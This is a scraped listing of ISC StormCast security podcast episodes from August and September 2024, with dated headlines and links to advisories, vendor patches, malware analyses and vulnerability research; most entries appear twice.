Password Cracking Energy: More Details https://isc.sans.edu/diary/Password%20Cracking%20%26%20Energy%3A%20More%20Dedails/31242 Python Notpad ++ https://isc.sans.edu/diary/Python%20%26%20Notepad%2B%2B/31240 Fake LinkedIn Job Ads https://cloud.google.com/blog/topics/threat-intelligence/examining-web3-heists/ Android Crypto Passphrase Stealer with OCR https://www.mcafee.com/blogs/other-blogs/mcafee-labs/new-android-spyagent-campaign-steals-crypto-credentials-via-image-recognition/ Sextortion Scam Now use Your Chating Spouses Name as a Lure https://www.bleepingcomputer.com/news/security/sextortion-scam-now-use-your-cheating-spouses-name-as-a-lure/
9/9/20246 minutes, 15 seconds
Episode Artwork

ISC StormCast for Friday, September 6th, 2024

Enrichment Data: Keeping it Fresh https://isc.sans.edu/diary/Enrichment%20Data%3A%20Keeping%20it%20Fresh/31236 Veeam Update https://www.veeam.com/kb4649 New OFBiz Vulnerabilities https://www.rapid7.com/blog/post/2024/09/05/cve-2024-45195-apache-ofbiz-unauthenticated-remote-code-execution-fixed/ Cisco Smart License Manager Patches https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cslu-7gHMzWmw
9/6/20246 minutes, 4 seconds
Episode Artwork

ISC StormCast for Friday, September 6th, 2024

Enrichment Data: Keeping it Fresh https://isc.sans.edu/diary/Enrichment%20Data%3A%20Keeping%20it%20Fresh/31236 Veeam Update https://www.veeam.com/kb4649 New OFBiz Vulnerabilities https://www.rapid7.com/blog/post/2024/09/05/cve-2024-45195-apache-ofbiz-unauthenticated-remote-code-execution-fixed/ Cisco Smart License Manager Patches https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cslu-7gHMzWmw
9/6/20246 minutes, 4 seconds
Episode Artwork

ISC StormCast for Thursday, September 5th, 2024

Scans for Moodle Learning Platform Following Recent Update https://isc.sans.edu/diary/Scans+for+Moodle+Learning+Platform+Following+Recent+Update/31230 PyPi Rivival HiJack https://jfrog.com/blog/revival-hijack-pypi-hijack-technique-exploited-22k-packages-at-risk/ Android Updates https://source.android.com/docs/security/bulletin/2024-09-01 Mediatec WAPPD PoC Exploit https://blog.coffinsec.com/0day/2024/08/30/exploiting-CVE-2024-20017-four-different-ways.html#wrapping-up
9/5/20246 minutes, 50 seconds
Episode Artwork

ISC StormCast for Thursday, September 5th, 2024

Scans for Moodle Learning Platform Following Recent Update https://isc.sans.edu/diary/Scans+for+Moodle+Learning+Platform+Following+Recent+Update/31230 PyPi Rivival HiJack https://jfrog.com/blog/revival-hijack-pypi-hijack-technique-exploited-22k-packages-at-risk/ Android Updates https://source.android.com/docs/security/bulletin/2024-09-01 Mediatec WAPPD PoC Exploit https://blog.coffinsec.com/0day/2024/08/30/exploiting-CVE-2024-20017-four-different-ways.html#wrapping-up
9/5/20246 minutes, 50 seconds
Episode Artwork

ISC StormCast for Wednesday, September 4th, 2024

Protected OOXML Text Documents https://isc.sans.edu/diary/Protected%20OOXML%20Text%20Documents/31078 Sextortion E-Mails with Photos https://krebsonsecurity.com/2024/09/sextortion-scams-now-include-photos-of-your-home/ Zyxel OS Command Injection Vulnerability https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-os-command-injection-vulnerability-in-aps-and-security-router-devices-09-03-2024 D-Link DIR-846W Unpatched RCE Vulnerabilities https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10411 VMWare Priviledge Escalation Vulnerability CVe-2024-38811 https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24939 YubiKey Sidechannel Attack https://ninjalab.io/wp-content/uploads/2024/09/20240903_eucleak.pdf https://www.yubico.com/support/security-advisories/ysa-2024-03/
9/4/20246 minutes, 42 seconds
Episode Artwork

ISC StormCast for Wednesday, September 4th, 2024

Protected OOXML Text Documents https://isc.sans.edu/diary/Protected%20OOXML%20Text%20Documents/31078 Sextortion E-Mails with Photos https://krebsonsecurity.com/2024/09/sextortion-scams-now-include-photos-of-your-home/ Zyxel OS Command Injection Vulnerability https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-os-command-injection-vulnerability-in-aps-and-security-router-devices-09-03-2024 D-Link DIR-846W Unpatched RCE Vulnerabilities https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10411 VMWare Priviledge Escalation Vulnerability CVe-2024-38811 https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24939 YubiKey Sidechannel Attack https://ninjalab.io/wp-content/uploads/2024/09/20240903_eucleak.pdf https://www.yubico.com/support/security-advisories/ysa-2024-03/
9/4/20246 minutes, 42 seconds
Episode Artwork

ISC StormCast for Tuesday, September 3rd, 2024

Wireshark 4.4: Converting Display Filters to BPF Capture Filters https://isc.sans.edu/diary/Wireshark+44+Converting+Display+Filters+to+BPF+Capture+Filters/31224 GitHub Comments Used to Spread Malware https://www.reddit.com/r/Malware/comments/1f2n1h4/comment/lkbi5gi/ Voldemort Malware Curses Orgs Using Global Tax Authorities https://www.darkreading.com/threat-intelligence/voldemort-malware-curses-orgs-global-tax-authorities Analysis of CVE-2024-43044 From file read to RCE in Jenkins through agents https://blog.convisoappsec.com/en/analysis-of-cve-2024-43044/
9/3/20245 minutes, 41 seconds
Episode Artwork

ISC StormCast for Tuesday, September 3rd, 2024

Wireshark 4.4: Converting Display Filters to BPF Capture Filters https://isc.sans.edu/diary/Wireshark+44+Converting+Display+Filters+to+BPF+Capture+Filters/31224 GitHub Comments Used to Spread Malware https://www.reddit.com/r/Malware/comments/1f2n1h4/comment/lkbi5gi/ Voldemort Malware Curses Orgs Using Global Tax Authorities https://www.darkreading.com/threat-intelligence/voldemort-malware-curses-orgs-global-tax-authorities Analysis of CVE-2024-43044 From file read to RCE in Jenkins through agents https://blog.convisoappsec.com/en/analysis-of-cve-2024-43044/
9/3/20245 minutes, 41 seconds
Episode Artwork

ISC StormCast for Friday, August 30th, 2024

Live Patching DLLs with Python https://isc.sans.edu/diary/Live%20Patching%20DLLs%20with%20Python/31218 Global Protect Phishing https://www.trendmicro.com/en_us/research/24/h/threat-actors-target-middle-east-using-fake-tool.html BlackByte Ransomware Update https://blog.talosintelligence.com/blackbyte-blends-tried-and-true-tradecraft-with-newly-disclosed-vulnerabilities-to-support-ongoing-attacks/ The Risks Lurking in Publicly Exposed GenAI Development Services https://www.legitsecurity.com/blog/the-risks-lurking-in-publicly-exposed-genai-development-services Finding Lateral Movement of Adversaries Through the Noise of Systems Administration https://www.sans.edu/cyber-research/finding-lateral-movement-adversaries-through-noise-systems-administration/ YouTube Channel: https://www.youtube.com/c/CyberAttackDefense
8/30/202414 minutes, 1 second
Episode Artwork

ISC StormCast for Friday, August 30th, 2024

Live Patching DLLs with Python https://isc.sans.edu/diary/Live%20Patching%20DLLs%20with%20Python/31218 Global Protect Phishing https://www.trendmicro.com/en_us/research/24/h/threat-actors-target-middle-east-using-fake-tool.html BlackByte Ransomware Update https://blog.talosintelligence.com/blackbyte-blends-tried-and-true-tradecraft-with-newly-disclosed-vulnerabilities-to-support-ongoing-attacks/ The Risks Lurking in Publicly Exposed GenAI Development Services https://www.legitsecurity.com/blog/the-risks-lurking-in-publicly-exposed-genai-development-services Finding Lateral Movement of Adversaries Through the Noise of Systems Administration https://www.sans.edu/cyber-research/finding-lateral-movement-adversaries-through-noise-systems-administration/ YouTube Channel: https://www.youtube.com/c/CyberAttackDefense
8/30/202414 minutes, 1 second
Episode Artwork

ISC StormCast for Thursday, August 29th, 2024

Vega-Lite With Kibana To Parse and Display IP Activity Over Time https://isc.sans.edu/diary/Vega-Lite%20with%20Kibana%20to%20Parse%20and%20Display%20IP%20Activity%20over%20Time/31210 Attack tool update impairs Windows computers https://news.sophos.com/en-us/2024/08/27/burnt-cigar-2/ Iran-based Cyber Actors Enabling Ransomware Attacks on US Organizations https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a Confluence Vulnerabilty Exploited for Crypto Miners https://www.trendmicro.com/en_us/research/24/h/cve-2023-22527-cryptomining.html Fortra FileCatalyst Workflow Hard Coded HSQLDB Credentials https://www.fortra.com/security/advisories/product-security/fi-2024-011
8/29/20245 minutes, 49 seconds
Episode Artwork

ISC StormCast for Thursday, August 29th, 2024

Vega-Lite With Kibana To Parse and Display IP Activity Over Time https://isc.sans.edu/diary/Vega-Lite%20with%20Kibana%20to%20Parse%20and%20Display%20IP%20Activity%20over%20Time/31210 Attack tool update impairs Windows computers https://news.sophos.com/en-us/2024/08/27/burnt-cigar-2/ Iran-based Cyber Actors Enabling Ransomware Attacks on US Organizations https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a Confluence Vulnerabilty Exploited for Crypto Miners https://www.trendmicro.com/en_us/research/24/h/cve-2023-22527-cryptomining.html Fortra FileCatalyst Workflow Hard Coded HSQLDB Credentials https://www.fortra.com/security/advisories/product-security/fi-2024-011
8/29/20245 minutes, 49 seconds
Episode Artwork

ISC StormCast for Wednesday, August 28th, 2024

Why is Python so Popular to Infect Windows Hosts https://isc.sans.edu/diary/Why%20Is%20Python%20so%20Popular%20to%20Infect%20Windows%20Hosts%3F/31208 OFBiz Vulnerability Update https://www.cisa.gov/known-exploited-vulnerabilities-catalog https://nvd.nist.gov/vuln/detail/CVE-2024-38856 Versa Directory Vulnerability Exploited https://versa-networks.com/blog/versa-security-bulletin-update-on-cve-2024-39717-versa-director-dangerous-file-type-upload-vulnerability/ Google Chrome Vulnerability Exploited https://chromereleases.googleblog.com/2024/08/stable-channel-update-for-desktop_21.html SGX Key Leak https://x.com/_markel___/status/1828112469010596347
8/28/20246 minutes, 8 seconds
Episode Artwork

ISC StormCast for Wednesday, August 28th, 2024

Why is Python so Popular to Infect Windows Hosts https://isc.sans.edu/diary/Why%20Is%20Python%20so%20Popular%20to%20Infect%20Windows%20Hosts%3F/31208 OFBiz Vulnerability Update https://www.cisa.gov/known-exploited-vulnerabilities-catalog https://nvd.nist.gov/vuln/detail/CVE-2024-38856 Versa Directory Vulnerability Exploited https://versa-networks.com/blog/versa-security-bulletin-update-on-cve-2024-39717-versa-director-dangerous-file-type-upload-vulnerability/ Google Chrome Vulnerability Exploited https://chromereleases.googleblog.com/2024/08/stable-channel-update-for-desktop_21.html SGX Key Leak https://x.com/_markel___/status/1828112469010596347
8/28/20246 minutes, 8 seconds
Episode Artwork

ISC StormCast for Tuesday, August 27th, 2024

From Highly Obfuscated Batch File to XWorm and Redline https://isc.sans.edu/diary/From%20Highly%20Obfuscated%20Batch%20File%20to%20XWorm%20and%20Redline/31204 CVE-2024-38063 Windows IPv6 Issue PoC Exploit https://github.com/ynwarcs/CVE-2024-38063 Not a vulnerability https://github.com/juwenyi/CVE-2024-42992
8/27/20245 minutes, 34 seconds
Episode Artwork

ISC StormCast for Tuesday, August 27th, 2024

From Highly Obfuscated Batch File to XWorm and Redline https://isc.sans.edu/diary/From%20Highly%20Obfuscated%20Batch%20File%20to%20XWorm%20and%20Redline/31204 CVE-2024-38063 Windows IPv6 Issue PoC Exploit https://github.com/ynwarcs/CVE-2024-38063 Not a vulnerability https://github.com/juwenyi/CVE-2024-42992
8/27/20245 minutes, 34 seconds
Episode Artwork

ISC StormCast for Monday, August 26th, 2024

Pandas Erros: What encoding are my logs in? https://isc.sans.edu/diary/Pandas%20Errors%3A%20What%20encoding%20are%20my%20logs%20in%3F/31200 Crowdstrike Performance Issues https://www.reddit.com/r/sysadmin/comments/1eyfex6/at_least_its_not_on_a_friday/ CopyBara Malware https://www.zscaler.com/blogs/security-research/technical-analysis-copybara#conclusion SonicWall Vulnerability https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0015
8/26/20245 minutes, 34 seconds
Episode Artwork

ISC StormCast for Monday, August 26th, 2024

Pandas Erros: What encoding are my logs in? https://isc.sans.edu/diary/Pandas%20Errors%3A%20What%20encoding%20are%20my%20logs%20in%3F/31200 Crowdstrike Performance Issues https://www.reddit.com/r/sysadmin/comments/1eyfex6/at_least_its_not_on_a_friday/ CopyBara Malware https://www.zscaler.com/blogs/security-research/technical-analysis-copybara#conclusion SonicWall Vulnerability https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0015
8/26/20245 minutes, 34 seconds
Episode Artwork

ISC StormCast for Friday, August 23rd, 2024

OpenAI Scans Honeypots https://isc.sans.edu/diary/OpenAI%20Scans%20for%20Honeypots.%20Artificially%20Malicious%3F%20Action%20Abuse%3F/31196 Broken Linux Boot Partitions after August Microsoft Update https://learn.microsoft.com/en-us/windows/release-health/status-windows-11-23H2#3377msgdesc Google Fixes Chrome 0-day https://chromereleases.googleblog.com/2024/08/stable-channel-update-for-desktop_21.html Cisco Zero Day Exploited (now Patched) https://www.sygnia.co/blog/china-threat-group-velvet-ant-cisco-zero-day/ Solar Winds Helpdesk Backdoor https://support.solarwinds.com/SuccessCenter/s/article/SolarWinds-Web-Help-Desk-12-8-3-Hotfix-2 Securing the Future: How Memory-Safe Programming Languages Impact Industry Safety (Christopher Ross) https://www.sans.edu/cyber-research/securing-future-how-memory-safe-programming-languages-impact-industry-safety/
8/23/202415 minutes, 20 seconds
Episode Artwork

ISC StormCast for Friday, August 23rd, 2024

OpenAI Scans Honeypots https://isc.sans.edu/diary/OpenAI%20Scans%20for%20Honeypots.%20Artificially%20Malicious%3F%20Action%20Abuse%3F/31196 Broken Linux Boot Partitions after August Microsoft Update https://learn.microsoft.com/en-us/windows/release-health/status-windows-11-23H2#3377msgdesc Google Fixes Chrome 0-day https://chromereleases.googleblog.com/2024/08/stable-channel-update-for-desktop_21.html Cisco Zero Day Exploited (now Patched) https://www.sygnia.co/blog/china-threat-group-velvet-ant-cisco-zero-day/ Solar Winds Helpdesk Backdoor https://support.solarwinds.com/SuccessCenter/s/article/SolarWinds-Web-Help-Desk-12-8-3-Hotfix-2 Securing the Future: How Memory-Safe Programming Languages Impact Industry Safety (Christopher Ross) https://www.sans.edu/cyber-research/securing-future-how-memory-safe-programming-languages-impact-industry-safety/
8/23/202415 minutes, 20 seconds
Episode Artwork

ISC StormCast for Thursday, August 22nd, 2024

Mapping Threats wiht DNSTwist and the Internet Storm Center https://isc.sans.edu/diary/Mapping%20Threats%20with%20DNSTwist%20and%20the%20Internet%20Storm%20Center%20%5BGuest%20Diary%5D/31188 Slack AI Prompt Injection https://promptarmor.substack.com/p/slack-ai-data-exfiltration-from-private Phishing in PWA Applications https://www.welivesecurity.com/en/eset-research/be-careful-what-you-pwish-for-phishing-in-pwa-applications/ QNAP Ransomware Security Center https://www.qnap.com/en/news/2024/qnap-officially-releases-qts-5-2-introducing-security-center-for-active-file-activity-monitoring-elevated-security-and-data-protection
8/22/20247 minutes, 5 seconds
Episode Artwork

ISC StormCast for Thursday, August 22nd, 2024

Mapping Threats wiht DNSTwist and the Internet Storm Center https://isc.sans.edu/diary/Mapping%20Threats%20with%20DNSTwist%20and%20the%20Internet%20Storm%20Center%20%5BGuest%20Diary%5D/31188 Slack AI Prompt Injection https://promptarmor.substack.com/p/slack-ai-data-exfiltration-from-private Phishing in PWA Applications https://www.welivesecurity.com/en/eset-research/be-careful-what-you-pwish-for-phishing-in-pwa-applications/ QNAP Ransomware Security Center https://www.qnap.com/en/news/2024/qnap-officially-releases-qts-5-2-introducing-security-center-for-active-file-activity-monitoring-elevated-security-and-data-protection
8/22/20247 minutes, 5 seconds
Episode Artwork

ISC StormCast for Wednesday, August 21st, 2024

Where are we with CVE-2024-38063: Microsoft IPv6 Vulnerability https://isc.sans.edu/diary/Where+are+we+with+CVE202438063+Microsoft+IPv6+Vulnerability/31186 Microsoft August Update Prevents Linux from Booting https://community.frame.work/t/sbat-verification-error-booting-linux-after-windows-update/56354 PHP CGI Vulnerability Exploited CVE-2024-4577 https://symantec-enterprise-blogs.security.com/threat-intelligence/taiwan-malware-dns F5 Updates https://my.f5.com/manage/s/article/K000140111 https://my.f5.com/manage/s/article/K000140108
8/21/20244 minutes, 54 seconds
Episode Artwork

ISC StormCast for Wednesday, August 21st, 2024

Where are we with CVE-2024-38063: Microsoft IPv6 Vulnerability https://isc.sans.edu/diary/Where+are+we+with+CVE202438063+Microsoft+IPv6+Vulnerability/31186 Microsoft August Update Prevents Linux from Booting https://community.frame.work/t/sbat-verification-error-booting-linux-after-windows-update/56354 PHP CGI Vulnerability Exploited CVE-2024-4577 https://symantec-enterprise-blogs.security.com/threat-intelligence/taiwan-malware-dns F5 Updates https://my.f5.com/manage/s/article/K000140111 https://my.f5.com/manage/s/article/K000140108
8/21/20244 minutes, 54 seconds
Episode Artwork

ISC StormCast for Tuesday, August 20th, 2024

Do you like donuts? Here is a donut Shellcode Delivered Through PowerShell Python https://isc.sans.edu/diary/Do%20you%20Like%20Donuts%3F%20Here%20is%20a%20Donut%20Shellcode%20Delivered%20Through%20PowerShell%20Python/31182 How Vulnerabilities in Microsoft Apps for MacOS allow Stealing Permissions https://blog.talosintelligence.com/how-multiple-vulnerabilities-in-microsoft-apps-for-macos-pave-the-way-to-stealing-permissions/ Digital Wallet Security Loophole https://www.umass.edu/news/article/new-study-reveals-loophole-digital-wallet-security-even-if-rightful-cardholder-doesnt Microsoft IPv6 Vulnerability CVE-2024-38063 https://x.com/f4rmpoet/status/1825472703223992323 YouTube Video (going live 10am ET) https://www.youtube.com/watch?v=miBb1llFOYQ
8/20/20247 minutes, 12 seconds
Episode Artwork

ISC StormCast for Tuesday, August 20th, 2024

Do you like donuts? Here is a donut Shellcode Delivered Through PowerShell Python https://isc.sans.edu/diary/Do%20you%20Like%20Donuts%3F%20Here%20is%20a%20Donut%20Shellcode%20Delivered%20Through%20PowerShell%20Python/31182 How Vulnerabilities in Microsoft Apps for MacOS allow Stealing Permissions https://blog.talosintelligence.com/how-multiple-vulnerabilities-in-microsoft-apps-for-macos-pave-the-way-to-stealing-permissions/ Digital Wallet Security Loophole https://www.umass.edu/news/article/new-study-reveals-loophole-digital-wallet-security-even-if-rightful-cardholder-doesnt Microsoft IPv6 Vulnerability CVE-2024-38063 https://x.com/f4rmpoet/status/1825472703223992323 YouTube Video (going live 10am ET) https://www.youtube.com/watch?v=miBb1llFOYQ
8/20/20247 minutes, 12 seconds
Episode Artwork

ISC StormCast for Monday, August 19th, 2024

Summarizing Web Honeypot Logs https://isc.sans.edu/diary/%5BGuest%20Diary%5D%207%20minutes%20and%204%20steps%20to%20a%20quick%20win%3A%20A%20write-up%20on%20custom%20tools/31170 Large Scale Cloud Extortion Operation https://unit42.paloaltonetworks.com/large-scale-cloud-extortion-operation/ Chrome Redacting Credit Cards and Passwords when you share Android Screens https://www.bleepingcomputer.com/news/google/chrome-will-redact-credit-cards-passwords-when-you-share-android-screen/ Google Products Targeted by Search Ad Scammers https://www.malwarebytes.com/blog/scams/2024/08/dozens-of-google-products-targeted-by-scammers-via-malicious-search-ads MakeShift: Security Analysis of Shimano Di2 Wireless Gear Shifting in Bicyles https://www.usenix.org/system/files/woot24-motallebighomi.pdf
8/19/20246 minutes, 6 seconds
Episode Artwork

ISC StormCast for Monday, August 19th, 2024

Summarizing Web Honeypot Logs https://isc.sans.edu/diary/%5BGuest%20Diary%5D%207%20minutes%20and%204%20steps%20to%20a%20quick%20win%3A%20A%20write-up%20on%20custom%20tools/31170 Large Scale Cloud Extortion Operation https://unit42.paloaltonetworks.com/large-scale-cloud-extortion-operation/ Chrome Redacting Credit Cards and Passwords when you share Android Screens https://www.bleepingcomputer.com/news/google/chrome-will-redact-credit-cards-passwords-when-you-share-android-screen/ Google Products Targeted by Search Ad Scammers https://www.malwarebytes.com/blog/scams/2024/08/dozens-of-google-products-targeted-by-scammers-via-malicious-search-ads MakeShift: Security Analysis of Shimano Di2 Wireless Gear Shifting in Bicyles https://www.usenix.org/system/files/woot24-motallebighomi.pdf
8/19/20246 minutes, 6 seconds
Episode Artwork

ISC StormCast for Friday, August 16th, 2024

Wireshark 4.4.0 rc 1 Custom Columns https://isc.sans.edu/diary/Wireshark%204.4.0rc1%27s%20Custom%20Columns/31174 Github Repo Artifact Leak Tokens https://unit42.paloaltonetworks.com/github-repo-artifacts-leak-tokens/ BitLocker Security Feature Bypass Vulnerability https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-38058 Solarwindws Hotfix https://support.solarwinds.com/SuccessCenter/s/article/WHD-12-8-3-Hotfix-1 Ed Skoudis, Paul Maurer: The Code of Honor https://cybercodeofhonor.com/
8/16/202417 minutes, 23 seconds
Episode Artwork

ISC StormCast for Friday, August 16th, 2024

Wireshark 4.4.0 rc 1 Custom Columns https://isc.sans.edu/diary/Wireshark%204.4.0rc1%27s%20Custom%20Columns/31174 Github Repo Artifact Leak Tokens https://unit42.paloaltonetworks.com/github-repo-artifacts-leak-tokens/ BitLocker Security Feature Bypass Vulnerability https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-38058 Solarwindws Hotfix https://support.solarwinds.com/SuccessCenter/s/article/WHD-12-8-3-Hotfix-1 Ed Skoudis, Paul Maurer: The Code of Honor https://cybercodeofhonor.com/
8/16/202417 minutes, 23 seconds
Episode Artwork

ISC StormCast for Thursday, August 15th, 2024

MSI Malware https://isc.sans.edu/diary/Multiple%20Malware%20Dropped%20Through%20MSI%20Package/31168 Microsoft IPv6 Vulnerablity CVE-2024-38063 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38063 https://x.com/XiaoWei___/status/1823532146679799993/photo/1 Critical Ivanti Virtual Traffic Manager Patch CVE-2024-7593 https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Virtual-Traffic-Manager-vTM-CVE-2024-7593?language=en_US Adobe Patches https://helpx.adobe.com/security/security-bulletin.html
8/15/20246 minutes, 41 seconds
Episode Artwork

ISC StormCast for Thursday, August 15th, 2024

MSI Malware https://isc.sans.edu/diary/Multiple%20Malware%20Dropped%20Through%20MSI%20Package/31168 Microsoft IPv6 Vulnerablity CVE-2024-38063 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38063 https://x.com/XiaoWei___/status/1823532146679799993/photo/1 Critical Ivanti Virtual Traffic Manager Patch CVE-2024-7593 https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Virtual-Traffic-Manager-vTM-CVE-2024-7593?language=en_US Adobe Patches https://helpx.adobe.com/security/security-bulletin.html
8/15/20246 minutes, 41 seconds
Episode Artwork

ISC StormCast for Wednesday, August 14th, 2024

Microsoft August 2024 Patch Tuesday https://isc.sans.edu/diary/Microsoft%20August%202024%20Patch%20Tuesday/31164 NIST Finalizes Post Quantum Encryption Standards https://www.nist.gov/news-events/news/2024/08/nist-releases-first-3-finalized-post-quantum-encryption-standards Zabbix Network Monitoring Updates https://support.zabbix.com/browse/ZBX-25016 https://support.zabbix.com/browse/ZBX-25013 (and others)
8/14/20246 minutes, 11 seconds
Episode Artwork

ISC StormCast for Wednesday, August 14th, 2024

Microsoft August 2024 Patch Tuesday https://isc.sans.edu/diary/Microsoft%20August%202024%20Patch%20Tuesday/31164 NIST Finalizes Post Quantum Encryption Standards https://www.nist.gov/news-events/news/2024/08/nist-releases-first-3-finalized-post-quantum-encryption-standards Zabbix Network Monitoring Updates https://support.zabbix.com/browse/ZBX-25016 https://support.zabbix.com/browse/ZBX-25013 (and others)
8/14/20246 minutes, 11 seconds
Episode Artwork

ISC StormCast for Tuesday, August 13th, 2024

QuickShell: Sharing is Caring about an RCE Attack Chain on Quick Share https://www.safebreach.com/blog/rce-attack-chain-on-quick-share Chrome, Edge users beset by malicious extensions that can t be easily removed https://www.helpnetsecurity.com/2024/08/12/chrome-edge-malicious-browser-extensions/ AMD Guest Memory Vulnerabilities https://www.amd.com/en/resources/product-security/bulletin/amd-sb-7014.html
8/13/20245 minutes, 31 seconds
Episode Artwork

ISC StormCast for Tuesday, August 13th, 2024

QuickShell: Sharing is Caring about an RCE Attack Chain on Quick Share https://www.safebreach.com/blog/rce-attack-chain-on-quick-share Chrome, Edge users beset by malicious extensions that can t be easily removed https://www.helpnetsecurity.com/2024/08/12/chrome-edge-malicious-browser-extensions/ AMD Guest Memory Vulnerabilities https://www.amd.com/en/resources/product-security/bulletin/amd-sb-7014.html
8/13/20245 minutes, 31 seconds
Episode Artwork

ISC StormCast for Monday, August 12th, 2024

CORS/SameOrigin Video https://isc.sans.edu/forums/diary/Video%3A%20Same%20Origin%2C%20CORS%2C%20DNS%20Rebinding%20and%20Localhost/31158/ Splitting the email atom: exploiting parsers to bypass access controls https://portswigger.net/research/splitting-the-email-atom#parser-discrepancies Confusion Attacks: Exploiting Hidden Semantic Ambiguity in Apache HTTP Server! https://blog.orange.tw/2024/08/confusion-attacks-en.html GL-Inet Patches https://www.gl-inet.com/security-updates/security-advisories-vulnerabilities-and-cves-aug-1-2024/ Microsoft Office Spoofing Vulnerability https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38200
8/12/20245 minutes, 51 seconds
Episode Artwork

ISC StormCast for Monday, August 12th, 2024

CORS/SameOrigin Video https://isc.sans.edu/forums/diary/Video%3A%20Same%20Origin%2C%20CORS%2C%20DNS%20Rebinding%20and%20Localhost/31158/ Splitting the email atom: exploiting parsers to bypass access controls https://portswigger.net/research/splitting-the-email-atom#parser-discrepancies Confusion Attacks: Exploiting Hidden Semantic Ambiguity in Apache HTTP Server! https://blog.orange.tw/2024/08/confusion-attacks-en.html GL-Inet Patches https://www.gl-inet.com/security-updates/security-advisories-vulnerabilities-and-cves-aug-1-2024/ Microsoft Office Spoofing Vulnerability https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38200
8/12/20245 minutes, 51 seconds
Episode Artwork

ISC StormCast for Friday, August 9th, 2024

Exploring Anti-Phishing Measures in Microsoft 365 https://certitude.consulting/blog/en/o365-anti-phishing-measures/ SSHamble Security Testing Tool https://www.runzero.com/blog/sshamble-unexpected-exposures-in-the-secure-shell/ macOS Sequoia Weekly Permission Prompts https://9to5mac.com/2024/08/06/macos-sequoia-screen-recording-privacy-prompt/ .internal domain https://www.icann.org/en/public-comment/proceeding/proposed-top-level-domain-string-for-private-use-24-01-2024
8/9/20246 minutes, 17 seconds
Episode Artwork

ISC StormCast for Friday, August 9th, 2024

Exploring Anti-Phishing Measures in Microsoft 365 https://certitude.consulting/blog/en/o365-anti-phishing-measures/ SSHamble Security Testing Tool https://www.runzero.com/blog/sshamble-unexpected-exposures-in-the-secure-shell/ macOS Sequoia Weekly Permission Prompts https://9to5mac.com/2024/08/06/macos-sequoia-screen-recording-privacy-prompt/ .internal domain https://www.icann.org/en/public-comment/proceeding/proposed-top-level-domain-string-for-private-use-24-01-2024
8/9/20246 minutes, 17 seconds
Episode Artwork

ISC StormCast for Thursday, August 8th, 2024

0.0.0.0 Day Exploiting Localhost APIs from the Browser https://www.oligo.security/blog/0-0-0-0-day-exploiting-localhost-apis-from-the-browser Apple Hardens Gatekeeper https://developer.apple.com/news/?id=saqachfa Downgrade Attacks Using Windows Updates https://www.safebreach.com/blog/downgrade-attacks-using-windows-updates/
8/8/20246 minutes, 20 seconds
Episode Artwork

ISC StormCast for Thursday, August 8th, 2024

0.0.0.0 Day Exploiting Localhost APIs from the Browser https://www.oligo.security/blog/0-0-0-0-day-exploiting-localhost-apis-from-the-browser Apple Hardens Gatekeeper https://developer.apple.com/news/?id=saqachfa Downgrade Attacks Using Windows Updates https://www.safebreach.com/blog/downgrade-attacks-using-windows-updates/
8/8/20246 minutes, 20 seconds
Episode Artwork

ISC StormCast for Wednesday, August 7th, 2024

A Survey of Scans For GeoServer Vulnerabilities https://isc.sans.edu/diary/A%20Survey%20of%20Scans%20for%20GeoServer%20Vulnerabilities/31148 Crowdstrike Root Cause Analysis https://www.crowdstrike.com/falcon-content-update-remediation-and-guidance-hub/ Kibana Vulnerability https://discuss.elastic.co/t/kibana-8-14-2-7-17-23-security-update-esa-2024-22/364424 Android August 2024 Bulletin https://source.android.com/docs/security/bulletin/2024-08-01 Ubiquity Amplication Attack Vulnerability Update https://blog.checkpoint.com/research/over-20000-ubiquiti-cameras-and-routers-are-vulnerable-to-amplification-attacks-and-privacy-risks/
8/7/20245 minutes, 58 seconds
Episode Artwork

ISC StormCast for Wednesday, August 7th, 2024

A Survey of Scans For GeoServer Vulnerabilities https://isc.sans.edu/diary/A%20Survey%20of%20Scans%20for%20GeoServer%20Vulnerabilities/31148 Crowdstrike Root Cause Analysis https://www.crowdstrike.com/falcon-content-update-remediation-and-guidance-hub/ Kibana Vulnerability https://discuss.elastic.co/t/kibana-8-14-2-7-17-23-security-update-esa-2024-22/364424 Android August 2024 Bulletin https://source.android.com/docs/security/bulletin/2024-08-01 Ubiquity Amplication Attack Vulnerability Update https://blog.checkpoint.com/research/over-20000-ubiquiti-cameras-and-routers-are-vulnerable-to-amplification-attacks-and-privacy-risks/
8/7/20245 minutes, 58 seconds
Episode Artwork

ISC StormCast for Tuesday, August 6th, 2024

Script Obfuscation Using Multiple Instances of the Same Function https://isc.sans.edu/diary/Script%20obfuscation%20using%20multiple%20instances%20of%20the%20same%20function/31144 Disclosure of key technical details of CrowdStrike's large-scale blue screen https://mp.weixin.qq.com/s/uD7mhzyRSX1dTW-TMg4UhQ New OFBiz Vulnerability https://issues.apache.org/jira/browse/OFBIZ-13128 https://www.youtube.com/watch?v=J_IxCBjd4Pw Roundcube XSS Vulnerabilities https://securityonline.info/roundcube-webmail-releases-security-updates-to-patch-multiple-vulnerabilities/
8/6/20246 minutes, 21 seconds
Episode Artwork

ISC StormCast for Tuesday, August 6th, 2024

